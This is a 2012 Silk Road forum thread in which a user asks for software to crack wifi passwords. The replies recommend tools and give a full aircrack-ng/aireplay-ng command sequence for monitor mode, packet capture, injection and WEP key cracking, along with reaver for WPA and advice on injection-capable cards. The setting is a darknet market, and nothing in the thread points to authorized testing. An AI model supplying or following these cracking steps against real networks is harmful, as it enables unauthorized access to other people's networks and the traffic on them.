Silk Road forums
Market => Product requests => Topic started by: tomorrowman on June 30, 2012, 02:58 pm
-
Im looking for a software that can crack wifi passwords.
-
Im looking for a software that can crack wifi passwords.
IIRC Kismet will do it or Kismac for OS X.
-
Im looking for a software that can crack wifi passwords.
IIRC Kismet will do it or Kismac for OS X.
is that an easy to operate software or do i need some knowledge? its been a while since i dabbled in this stuff.
-
Backtrack Linux (google and youtube it)
-
Im looking for a software that can crack wifi passwords.
IIRC Kismet will do it or Kismac for OS X.
is that an easy to operate software or do i need some knowledge? its been a while since i dabbled in this stuff.
It's a GUI, point and click. It will scan for networks and then you can select one to analyse and attempt to crack. It can take a while, though, because it needs to gather a fair number of packets first.
-
Backtrack 5 R2 is what I use. For WEP use the airmon/aircrack suite that is included. For WPA use the reaver suite that's included. I can crack WEP in 5 minutes or less but WPA can take up to 10 hours using reaver but it's a lot better than the years that it may take by doing a brute force attack.
Here is the basic script I use to crack WEP in terminal in Backtrack 5:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c (channel) -w (filename) --bssid (bssid) mon0
[new terminal]
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (bssid) mon0
use this packet? y for yes
[new terminal]
aircrack-ng (filename)*.cap
If you need, you can get backtrack 5 for free from http://www.backtrack-linux.org/downloads/ and just torrent a version of VMWare to get it to run.
-
problem with Backtrack 5 R2 is that its linux based, i need something that is windows based. plan on using it on a tablet.
-
problem with Backtrack 5 R2 is that its linux based, i need something that is windows based. plan on using it on a tablet.
You can't install VMWare on the tablet?
-
i have no idea if you can install that o a tablet. i even tried downloading one of the programs mentioned above and couldn't even install them let alone configure them to run on a tablet.
-
problem with Backtrack 5 R2 is that its linux based, i need something that is windows based. plan on using it on a tablet.
You can't install VMWare on the tablet?
Do you know how that program compares to IIRC Kismet mentioned earlier or if that one works on windows?
And if you don't mind me badgering you too much, does VMWare work as a window within your normal OS or can you not switch between them? I used to have it installed (maybe I still do...) but I can't recall ever actually using it.
Yes i have had it run on a windows OS and it it is fairly easy to run. I have had both running no problem at the same time except you have to have a wireless card compatible with a linux OS. Only problem is you can't have a wireless card being used by Win7 and backtrack at the same time.
-
Yes i have had it run on a windows OS and it it is fairly easy to run. I have had both running no problem at the same time except you have to have a wireless card compatible with a linux OS. Only problem is you can't have a wireless card being used by Win7 and backtrack at the same time.
I believe that's the case with Kismet and probably all such software too. The wireless interface can only maintain one connection at a time, so while it is connecting to a wireless service to attempt to crack it, it cannot be connected to another service simultaneously.
-
you need to make sure your wifi card will support injection, if it doesnt no matter what platform you run it on it wont work.
-
you need to make sure your wifi card will support injection, if it doesnt no matter what platform you run it on it wont work.
That is correct! the wifi card needs to support packet injection. If you go into best buy and ask that they will probably just give you an odd look so you'll have to do a little research. I know the ASUS USB-N13 card does.
-
Deadfuture is correct ~ You need to be able to run in promiscuous mode which requires a supported Wifi card.
Use google man.